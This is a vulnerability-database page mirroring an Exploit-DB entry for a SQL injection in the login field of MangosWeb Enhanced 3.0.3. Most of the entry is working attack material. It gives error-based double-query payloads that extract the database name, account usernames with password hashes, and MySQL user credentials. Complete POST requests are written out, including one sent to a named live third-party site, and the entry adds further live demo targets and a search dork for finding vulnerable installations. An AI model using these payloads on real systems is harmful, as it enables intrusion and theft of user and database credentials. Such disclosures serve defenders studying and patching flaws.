Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MangosWeb - SQL Injection

🗓️ 08 Jan 2012 00:00:00Reported by Hood3dRob1nType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 33 Views

MangosWeb SQL Injection vulnerability in Login field allows for double-query injection over POST request leading to user info and database credentials extraction

Code
EXPLOIT TITLE: MangosWeb SQL Vulnerability
DATE: 1/7/2012
BY Hood3dRob1n
AFFECTED PRODUCTS: MangosWeb Enhanced Version 3.0.3
SW LINK: http://code.google.com/p/mwenhanced/
CATEGORY: WebApp 0day
DORK: intext:MangosWeb ENhanced Version 3.0.3 @2009-2011, KeysWow Dev Team
TESTED ON: W7 & Backtrack 5
DEMO1: http://wowfaction.selfip.com/wow/
DEMO2: http://www.mojotrollz.eu/
DEMO3: http://h1987786.stratoserver.net:8096/
Greetz to: -DownFall, Zer0Pwn, zerofreak, ~!White!~, Dr. Hobo, ring0_, Pi  , and Greyerstring!

Found SQL vulnerabilities in this CMS whcih seems to affect a large amount of online gaming sites. There is a SQL injection vulnerability in the Login field of the login form located at the top of the site pages. If you inject a single apostrophe (') into this field and pass anything you want in password field you can trigger the SQL Error message. It requires the use of double-query injection, using string method, over POST request to exploit this vulnerability which can lead to extraction of user info as well as databse user credentials. You can use Tamper Data, Live HTTP Headers to replicate the results but AI find it easiest to perform this type of injection from Burp Suite...

Proof of Concept (PoC):
You need to first get the name of the current database using this syntax injected into the Login field:

'and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)--+-

Once we have that we can grab the authorized user details with this syntax injected into Login:

'and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,id,0x3a,username,0x3a,sha_pass_hash,0x3a) FROM TableName.account+LIMIT+N,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)--+-

NOTE: Replace the TableName with the results from the first injection, and then use the N position to enumerate the results for all entries. 

Extraction of MySQL User Credentials requires one to inject the following syntax into the Login field:

'and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,host,0x3a,user,0x3a,password,0x3a,file_priv,0x3a,super_priv) FROM mysql.user+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)--+-



Examples:
=====================================================================================================
POST /?p=account&sub=login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/?p=server&sub=chars
Cookie: Language=English; cur_selected_realm=1; cur_selected_theme=0; cookies=true; menuCookie=1%201%200%200%200%201%200%200
Content-Type: application/x-www-form-urlencoded
Content-Length: 244

login='and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)--+-&pass=fubar&action=login&x=0&y=0
=====================================================================================================
POST /?p=account&sub=login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/?p=server&sub=chars
Cookie: Language=English; cur_selected_realm=1; cur_selected_theme=0; cookies=true; menuCookie=1%201%200%200%200%201%200%200
Content-Type: application/x-www-form-urlencoded
Content-Length: 244

login='and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,id,0x3a,username,0x3a,sha_pass_hash,0x3a) FROM tbc_realm.account+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)--+-&pass=fubar&action=login&x=0&y=0
=====================================================================================================
POST /wow/?p=account&sub=login HTTP/1.1
Host: wowfaction.selfip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://wowfaction.selfip.com/wow/
Cookie: Language=English; cur_selected_realm=1; cur_selected_theme=0; menuCookie=1%201%200%200%200%201%200%200; cookies=true; base_language_id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

login='and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,host,0x3a,user,0x3a,password,0x3a,insert_priv,0x3a,file_priv,0x3a,super_priv) FROM mysql.user+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)--+-&pass=fubar&action=login&x=0&y=0
=====================================================================================================
POST /?p=account&sub=login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/?p=server&sub=chars
Cookie: Language=English; cur_selected_realm=1; cur_selected_theme=0; cookies=true; menuCookie=1%201%200%200%200%201%200%200
Content-Type: application/x-www-form-urlencoded
Content-Length: 273

login='and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,host,0x3a,user,0x3a,password,0x3a,insert_priv,0x3a,file_priv,0x3a,super_priv) FROM mysql.user+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)--+-&pass=fubar&action=login&x=0&y=0
=====================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Jan 2012 00:00Current
7.4High risk
Vulners AI Score7.4
mangoswebsql injectionlogin fielddouble-query injectionpost requestuser infodatabase credentialsvulnerability
33